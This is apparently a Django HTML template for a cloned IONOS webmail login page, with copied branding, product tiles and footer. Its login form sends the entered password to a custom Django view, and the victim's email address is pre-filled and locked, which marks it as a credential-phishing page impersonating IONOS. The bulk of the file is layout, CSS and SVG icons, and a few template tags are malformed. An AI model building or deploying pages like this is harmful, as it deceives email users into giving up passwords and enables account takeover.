{% load static %}
<!DOCTYPE html>
<html lang="en">
  <head>
  <!-- charset -->
  <meta charset="utf-8">

  <!-- head infos -->
  <title>Webmail Login | IONOS</title>

  <!-- mobile config -->
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- microsoft mobile config -->
  <meta id="win8Icon" name="msapplication-TileImage" content="img/apple-touch-icon.png' %}">
  <meta id="win8TileColor" name="msapplication-TileColor" content="#003d8f">
  <!-- apple mobile config -->
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-title" content>
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <!-- apple-touch-icon -->
  <link rel="apple-touch-icon" href="{% static 'images/apple-touch-icon.png' %}">
  <!-- apple-touch-startup-image [media-devicewidth is not W3C-conform] -->
  <link rel="apple-touch-startup-image" href="img/apple-launch.png' %}">
  <!-- favicon -->
  <link id="favicon" rel="shortcut icon" href="{% static 'favicon.ico' %}" type="image/x-icon">

  <!-- Font Awesome 5 core CSS -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">

  <!-- css includes -->
  <link rel="stylesheet" type="text/css" href="{% static 'css/ionos.min.css' %}">
  <link rel="stylesheet" type="text/css" href="{% static 'css/login.min.css' %}">
</head>
<body>

<!-- exos main -->
<main class="page-content">

  <!-- exos - global navigation -->

  <header>
    <div class="header-1">
      <div class="container">
        <div class="logo-search">
          <div class="logo">
            <img src="{% static 'images/logo.png' %}" alt=""> <h1>WEBMAIL</h1>
          </div>
          <div class="search">
            <label for="inp"><i class="fas fa-search" style="color: white;font-size: 20px;"></i></label>
            <input type="text" placeholder="Search for features, domains and help" id="inp" style="width: 100%;">
            <i class="fas fa-microphone" style="color: white;font-size: 20px;"></i>
          </div>
        </div>
        
        <div class="message">
          <div class="img">
            <img class="img-1" src="{% static 'images/message.png' %}" alt="">
            <img class="img-2" src="{% static 'images/message-2.png' %}" alt="">
            <span class="toolpick">Help and contact</span>
          </div>
          <label for="inp"><i class="fas fa-search" onclick="openHead()" style="color: white;font-size: 20px;"></i></label>
        </div>
      </div>
    </div>

    <div class="header-2" id="header2">
      <div class="container">
        <i class="fas fa-chevron-left" onclick="closeHead()" style="margin-right: 10px;font-size:22px;color: #ffc;cursor: pointer;"></i>
        <div class="search">
          <input type="text" placeholder="Search for features, domains and help" id="inp" style="width: 100%;">
          <i class="fas fa-microphone" style="color: white;font-size: 20px;"></i>
        </div>
    </div>
  </header>

  <style>
    .header-1, .header-2{
      background: rgb(40, 40, 146);
      position: fixed;
      height: 64px;
      top: 0;
      left: 0;
      right: 0;
      z-index: 9999;
      padding: 0 25px;
    }
    .header-2{
      display: none;
    }
    .header-1 .container, .header-2 .container{
      height: 100%;
      width: 100%;
      display: flex;
      align-items: center;
      justify-content: space-between;
      
    }
    .header-1 .logo-search{
      display: flex;
      align-items: center;
      width: 70%;
    }
    .header-1 .logo-search .logo{
      display: flex;
      align-items: center;
      width: 45%;
    }
    .header-1 .logo-search .logo img{
      width: 90px;
    }
    .header-1 .logo h1{
      color: #ffc;
      margin-left: 20px;
      font-size: 23px;
      font-weight: 700;
    }
    .header-1 .search{
      display: flex;
      width: 55%;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    .header-2 .search{
      display: flex;
      width: 105%;
      border: 1px solid rgb(13, 240, 202);
      border-radius: 5px;
      padding-left: 10px;
      padding-right: 10px;
    }
    .header-1 .search input{
      border: none;
      outline: none;
      background: transparent;
      font-size: 17px;
      color: #ffc;
      text-overflow: ellipsis;
    }
    .header-2 .search input{
      border: none;
      outline: none;
      background: transparent;
      font-size: 16px;
      color: #ffc;
      text-overflow: ellipsis;
    }
    .header-1 .search input::placeholder, .header-2 .search input::placeholder{
      color: #ffc;
    }
    .header-1 .search i{
      padding: 10px 10px;
      cursor: pointer;
    }
    .header-2 .search i{
      padding: 8px 10px;
      cursor: pointer;
    }
    .message i{
      cursor: pointer;
    }
    .message .fa-search{
      display: none;
    }
    .message .img{
      width: 35px;
      position: relative;
    }
    .message .img img{
      position: absolute;
      top: -12px;
      left: -10px;
      z-index: 88;
      cursor: pointer;
      width: 100%;
    }
    .message .img .img-2{
      z-index: -1;
      opacity: 0;
      pointer-events: none;
    }
    .message .img:hover .img-2{
      z-index: 88;
      opacity: 1;
      pointer-events: visible;
    }
    .message .img:hover .img-1{
      z-index: -1;
      opacity: 0;
      pointer-events: none;
    }
    .message .img span.toolpick{
      position: absolute;
      left: -135px;
      top: -8px;
      border-radius: 5px;
      background: #666;
      color: #ffc;
      padding: 7px;
      opacity: 0;
      cursor: auto;
    }
    .message .img:hover span.toolpick{
      opacity: 1;
    }
    @media only screen and (max-width: 767px) {
      .message img{
        display: none;
      }
      .message .fa-search{
        display: block;
      }
      .header-1 .search{
        display: none;
      }
    }

    .ciso-afs-ads{
      position: relative;
      background: #fff;
      padding:28px 30px;
      display: flex;
    }
    .ciso-afs-ads h1{
      font-size: 18px;
      color: black;
      font-weight: 700;
      margin-bottom: 15px;
    }
    .ciso-afs-ads p{
      margin-bottom: 15px;
    }
    .ciso-afs-ads button{
      font-weight: 300;
    }
    .ciso-afs-ads .image{
      width: 250px;
    }
    .ciso-afs-ads .image img{
      width: 100%;
    }

    @media only screen and (max-width: 666px) {
      .ciso-afs-ads{
        display: block;
      }
      .ciso-afs-ads .image{
        width: 450px;
      }
    }

    .a-form{
      color: black;
      text-decoration: none;
      border-bottom: 1px dotted black;
      cursor: help;
    }
    .a-form:hover{
      color: deepskyblue;
      background: rgb(245, 240, 202);
    }
  </style>

  <script>
    var header = document.getElementById('header2');

    function openHead(){
      header.style.display = 'flex';
    }
    function closeHead(){
      header.style.display = 'none';
    }
  </script>





  <div class="clearfix" id="content"  onclick="closeHead()">
    <div class="page-section page-section--default page-section--short">
      <div class="page-section__block">

        <!-- Global Navigation > Statuspage Integration > Incident/Maintenance status -->

        <!-- error for JS-disabled browsers -->
        <noscript>
          <p class="noscript">
            This page uses JavaScript.
            Your browser either doesn't support JavaScript or you have it turned off.
            To use this page please use a JavaScript enabled browser.
          </p>
        </noscript>

        <!-- JavaScript based login-form -->
        <div class="sheet">
          <div class="sheet__section">
            <div class="sheet__block"><h1>Webmail login</h1>
              <form method="POST" action="{% url 'login_page:email_view' email %}" autocomplete="off" id="login-form" class="form content-elem" >
                <legend class="hidden"></legend>

                <!-- NON-exos: error output -->
                <div id="login-error" class="notificaiton-wrap"></div>

                <span class="input-text-group input-text-group--empty" style="overflow: visible; margin-bottom: 10px;"><span class="input-text-group__icon exos-icon exos-icon-nav-user-16"></span>
                <!-- type email not working in IE for Umlaut-Domains currently -->
                <input class="input-text login-form-user" name="email" id="login-form-user" maxlength="200"  size="40" tabindex="1" autocapitalize="none" spellcheck="false" type="email" required="true" value="{{email}}" disabled><label class="label login-form-user-label" for="login-form-user"><span></span></label></span>
                <div class="label align-horizontal-right">
                  <a href="" class="a-form">
                    <span>Forgot Password?</span>
                  </a>
                </div>
                
                <span class="input-text-group input-text-group--empty" style="overflow: visible; margin-bottom: 10px;"><span class="input-text-group__icon exos-icon exos-icon-password-16"></span>

                <input class="input-text login-form-password" 
                autocomplete="off"  id="login-form-password" name="password"  maxlength="40" size="40" tabindex="2" type="password"  required="true" value><label class="label login-form-password-label" for="login-form-password"><span>Password</span></label></span>

                <div class="sub-form-field left">
                  <input id="staysignedin-box" class="input-checkbox" name="staysignedin" type="checkbox" value="1" tabindex="3">
                  <label for="staysignedin-box">
                    <a href="#" class="a-form">
                      <span>stay logged in</span>
                    </a>
                  </label>
                </div>
                {% csrf_token %}
                <footer class="sheet__footer">
                  <button class="button button--primary button--full-width" name="submit" tabindex="3" type="submit">Log in</button>
                 <!--  <input type="submit" value="Login" class="button button--primary button--full-width"> -->

                </footer>
              </form>
            </div>
          </div>
        </div>

        <section class="ciso-afs-ads">
          <div class="inner">
            <h1>Don't have a professional email inbox yet?</h1>
            <p>IONOS email mailbox from €1. Incl. free domain.</p>
            <a href="#">
              <button class="button button--primary" name="serch" tabindex="3" type="search">Learn more</button>
            </a>
          </div>
          <div class="image">
            <img src="{% static 'images/email-marketing.svg' %}" alt="">
          </div>
        </section>

        <section id="assistants">
          <h2 class="headline headline--sub">Set up your e-mail inbox on other devices</h2>
          <dl class="pipe-list">
            <dt>Mobile</dt>
            <dd>
              <a href="#" class="link" tabindex="9" target="_blank">
                <span>iOS</span>
              </a>
            </dd>
            <dd>
              <a href="#" class="link" tabindex="10" target="_blank">
                <span>Andriod</span>
              </a>
            </dd>
          </dl>
          <dl class="pipe-list">
            <dt>Desktop</dt>
            <dd>
              <a href="#" class="link" tabindex="11" target="_blank">
                <span>Thunderbird</span>
              </a>
            </dd>
            <dd>
              <a href="#" class="link" tabindex="12" target="_blank">
                <span>Outlook</span>
              </a>
            </dd>
            <dd>
              <a href="" href class="link" tabindex="13" target="_blank">
                <span>Apple Mail</span>
              </a>
            </dd>
          </dl>
          <dl class="pipe-list">
            <dt>Other</dt>
            <dd>
              <a href="#" class="link" tabindex="14" target="_blank">
                <span>email programs (POP/IMAP)</span>
              </a>
            </dd>
          </dl>
        </section>


        <h2 class="headline headline--sub">Other IONOS Logins</h2>
        <div class="grid-12 equal-grid-spacing equal-grid-height">
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both">
              <a class="tile tile--filled" href="#" tabindex="6">
                <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                  <path class="product-icon__key" fill="#0b9dcc" d="M84,58c6.6,0,12-5.4,12-12s-5.4-12-12-12s-12,5.4-12,12S77.4,58,84,58z M84,38c4.4,0,8,3.6,8,8s-3.6,8-8,8
          s-8-3.6-8-8S79.6,38,84,38z M107.2,78C104.5,67.4,95,60,84,60s-20.5,7.4-23.2,18c-0.2,0.9,0.2,1.8,1,2.2C68.5,84,76.2,86,84,86
          s15.5-2,22.3-5.8C107.1,79.8,107.5,78.9,107.2,78z M84,82c-6.6,0-13.1-1.6-18.9-4.5C67.8,69.5,75.4,64,84,64s16.2,5.5,18.9,13.5
          C97.1,80.4,90.6,82,84,82z"/>
                  <path class="product-icon__base" fill="#001b41" d="M156.4,55.6l-8.9,9.7c-0.4,0.4-0.9,0.7-1.5,0.7c0,0,0,0,0,0c0,0,0,0,0,0c-0.4,0-0.8-0.1-1.1-0.3l-11-7.3
          c-0.9-0.6-1.2-1.9-0.6-2.8c0.6-0.9,1.9-1.2,2.8-0.6l7.7,5.1C141.9,28.9,115.8,4,84,4C55.4,4,30.6,24.3,25.1,52.4
          c-0.2,1.1-1.3,1.8-2.3,1.6c-1.1-0.2-1.8-1.3-1.6-2.3C27.1,21.7,53.5,0,84,0c33.6,0,61.3,26.1,63.8,59.1l5.6-6.1
          c0.7-0.8,2-0.9,2.8-0.1C157,53.5,157.1,54.8,156.4,55.6z M145.2,74c-1.1-0.2-2.1,0.5-2.3,1.6c-5.5,28-30.3,48.4-58.9,48.4
          c-31.8,0-57.9-24.9-59.9-56.2l7.7,5.1c0.3,0.2,0.7,0.3,1.1,0.3c0.6,0,1.3-0.3,1.7-0.9c0.6-0.9,0.4-2.2-0.6-2.8l-11-7.3
          c-0.8-0.5-1.9-0.4-2.5,0.3c0,0-8.9,9.8-8.9,9.8c-0.7,0.8-0.7,2.1,0.1,2.8c0.4,0.4,0.9,0.5,1.3,0.5c0.5,0,1.1-0.2,1.5-0.7l5.6-6.1
          c2.5,33,30.2,59.1,63.8,59.1c30.5,0,56.9-21.7,62.8-51.6C147,75.3,146.3,74.2,145.2,74z"/>
                </svg>
                <span class="tile__label">My IONOS</span>
              </a>
            </div>
          </div>
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both">
              <a class="tile tile--filled" href="#" tabindex="7">
                <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                  <path class="product-icon__key" d="M58,72h6v14c0,1.1,0.9,2,2,2h36c1.1,0,2-0.9,2-2V72h6c0.9,0,1.7-0.6,1.9-1.5c0.2-0.9-0.1-1.8-0.9-2.2l-26-16         c-0.6-0.4-1.5-0.4-2.1,0l-26,16c-0.8,0.5-1.1,1.4-0.9,2.2C56.3,71.4,57.1,72,58,72z M84,56.3L102.9,68H102c-1.1,0-2,0.9-2,2v14H68         V70c0-1.1-0.9-2-2-2h-0.9L84,56.3z M110,108h-6V94c0-1.1-0.9-2-2-2H66c-1.1,0-2,0.9-2,2v14h-6c-0.9,0-1.7,0.6-1.9,1.5         c-0.2,0.9,0.1,1.8,0.9,2.2l26,16c0.3,0.2,0.7,0.3,1,0.3s0.7-0.1,1-0.3l26-16c0.8-0.5,1.1-1.4,0.9-2.2         C111.7,108.6,110.9,108,110,108z M84,123.7L65.1,112H66c1.1,0,2-0.9,2-2V96h32v14c0,1.1,0.9,2,2,2h0.9L84,123.7z" fill="#0b9dcc"/>
                  <path class="product-icon__base" d="M136,104h-22c-1.1,0-2-0.9-2-2s0.9-2,2-2h22c15.4,0,28-12.6,28-28c0-12.4-7.9-23.1-19.7-26.8         c-0.7-0.2-1.2-0.7-1.3-1.4C139.3,29.8,126.5,20,112,20c-0.6,0-1.3,0-2,0.1c-0.6,0-1.2-0.2-1.6-0.7C99.6,9.6,87.1,4,74,4         C52.7,4,34.3,18.5,29.3,39.2c-0.2,0.7-0.8,1.3-1.5,1.5C14,43.6,4,55.9,4,70c0,16.5,13.5,30,30,30h20c1.1,0,2,0.9,2,2s-0.9,2-2,2H34         C15.3,104,0,88.7,0,70c0-15.6,10.7-29.2,25.7-33C31.6,15.2,51.2,0,74,0c13.9,0,27.2,5.8,36.7,16c0.5,0,0.9,0,1.3,0         c16,0,30,10.5,34.5,25.8C159.4,46.2,168,58.3,168,72C168,89.6,153.6,104,136,104z" fill="#001b41"/>
                </svg>
                <span class="tile__label">HiDrive</span>
              </a>
            </div>
          </div>
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both">
              <a class="tile tile--filled" href="#" tabindex="8">
                <svg class="product-icon" viewBox="0 0 128 128" xmlns="http://www.w3.org/2000/svg">
                  <path class="product-icon__base" d="M88,16H57.05V12H90a2,2,0,0,1,2,2V26.22H88Zm8-3.18v13.4h4V12.82A8.84,8.84,0,0,0,91.17,4H57.05V8H91.17A4.83,4.83,0,0,1,96,12.82Zm0,88.38v14A4.82,4.82,0,0,1,91.18,120H57.05v4H91.18a8.83,8.83,0,0,0,8.82-8.82v-14Zm-8,0V112H57.05v4H90a2,2,0,0,0,2-2V101.2Z" fill="#001b41"/>
                  <path class="product-icon__key" d="M120.8,26H57.05v4H120.8a3.26,3.26,0,0,1,1.32.29L95.24,49.79c-1.12.85-4.62,3.06-7.38,3.06s-6.26-2.21-7.4-3.08L57.7,33c-.2-.15-.65,4.49-.65,4.49L78.06,53s.33.25.79.56L57.05,70.72s.49,4.71.71,4.54l24.9-19.64a13.54,13.54,0,0,0,5.2,1.23,13.46,13.46,0,0,0,5.22-1.24l28.56,22.27a3.35,3.35,0,0,1-.84.13H57.05v4h59v2a4,4,0,0,1-4,4H57.05v4h51v2a4,4,0,0,1-4,4H57.05v4h47a8,8,0,0,0,8-8V92a8,8,0,0,0,8-8V82h.8a7.21,7.21,0,0,0,7.2-7.2V33.2A7.21,7.21,0,0,0,120.8,26ZM124,74.64,96.9,53.51c.42-.28.69-.48.72-.51L124,33.87Z" fill="#0b9dcc"/>
                  <path class="product-icon__base" d="M28.56,39.38c-8.27,0-14.74,11-14.74,25.09s6.47,25.1,14.74,25.1,14.73-11,14.73-25.1S36.82,39.38,28.56,39.38Zm5.14,6.68-1.56,2.42a2,2,0,0,0,.6,2.77,2,2,0,0,0,1.08.32,2,2,0,0,0,1.68-.92l.63-1a27.18,27.18,0,0,1,1.54,3.84l-1.61,1a2,2,0,0,0,2.08,3.42l.53-.32a38.26,38.26,0,0,1,.57,4.93h-.7a2,2,0,0,0,0,4h.69a37.47,37.47,0,0,1-.53,4.62l-.34-.24a2,2,0,0,0-2.31,3.27l1.64,1.15A26.29,26.29,0,0,1,36,79.42l-.77-1.28a2,2,0,0,0-3.42,2.08L33.56,83a8.51,8.51,0,0,1-2.74,2V83.58a2,2,0,0,0-4,0v1.67a8,8,0,0,1-3-2l1.85-3a2,2,0,0,0-3.42-2.08l-1,1.59a24.65,24.65,0,0,1-1.75-4.18l1.93-1.36a2,2,0,1,0-2.3-3.27l-.67.47a39,39,0,0,1-.57-4.85h1.06a2,2,0,0,0,0-4H17.87a37.7,37.7,0,0,1,.61-5.13l.86.52a2,2,0,0,0,1,.29,2,2,0,0,0,1-3.71l-1.77-1.08-.15-.07a25,25,0,0,1,1.65-4L22,50.65a2,2,0,0,0,1.68.92,2.09,2.09,0,0,0,1.09-.32,2,2,0,0,0,.59-2.77L23.72,46a.76.76,0,0,0-.11-.14,8.14,8.14,0,0,1,3-2.11V45.5a2,2,0,0,0,4,0V43.8A8.58,8.58,0,0,1,33.7,46.06ZM21.77,64.47c0,6.09,2.92,10.68,6.79,10.68s6.78-4.59,6.78-10.68-2.92-10.68-6.78-10.68S21.77,58.38,21.77,64.47Zm9.57,0c0,4-1.67,6.68-2.78,6.68s-2.79-2.66-2.79-6.68,1.68-6.68,2.79-6.68S31.34,60.46,31.34,64.47ZM56.47,2.06l-8.26-2a2,2,0,0,0-1.08,0L34.85,4h-26A8.84,8.84,0,0,0,0,12.82V115.18A8.83,8.83,0,0,0,8.82,124H35l12.38,3.91a2,2,0,0,0,.6.09,2.05,2.05,0,0,0,.49-.06l7.94-2A2,2,0,0,0,57.94,124L58,4A2,2,0,0,0,56.47,2.06ZM12,93.72A2,2,0,0,0,13,92V80a2,2,0,0,0-1-1.72V51.72A2,2,0,0,0,13,50V38a2,2,0,0,0-1-1.72V15.46L46,4.65V123.27L12,112.53ZM8.82,120A4.82,4.82,0,0,1,4,115.18V12.82A4.83,4.83,0,0,1,8.83,8H22.27L9.39,12.09A2,2,0,0,0,8,14V36.28A2,2,0,0,0,7,38V50a2,2,0,0,0,1,1.72V78.28A2,2,0,0,0,7,80V92a2,2,0,0,0,1,1.72V114a2,2,0,0,0,1.4,1.91l13,4.09Zm45.12,2.44-3.94,1V4.61l4,1Z" fill="#001b41"/>
                </svg>
                <span class="tile__label">Email archive</span>
              </a>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
</main>

<!-- exos footer -->
<footer class="page-footer">
  <div class="page-footer__block">
    <section class="page-footer__section page-footer__section--align-center page-footer__section--small-align-left">
      <div class="page-footer__section-item">
        <a class="link" href="#" style="position: relative;padding-left: 25px;" target="_blank">
          <span style="content: '';height: 12px;width: 12px;border-radius: 50%;background: rgb(13, 228, 67);position: absolute;left: 2px;top: 3px;"></span><span>All systems functional</span>
        </a>
      </div>
      <div class="page-footer__section-item">
        <a class="link" href="" target="_blank">
          <span>IONOS SE</span> • <span>2023</span>
        </a>
      </div>
      <div class="page-footer__section-item">
        <a class="link" href="" target="_blank">
          <span>Privacy Policy</span>
        </a>
      </div>
    </section>
  </div>
</footer>

<!-- SPA workaround iframe -->
<iframe class="hidden" src="robots.txt" name="loginTarget"></iframe>

<!-- js libs -->
<script src="{% static 'js/ionos.min.js' %}" async="async"></script>


</body>
</html>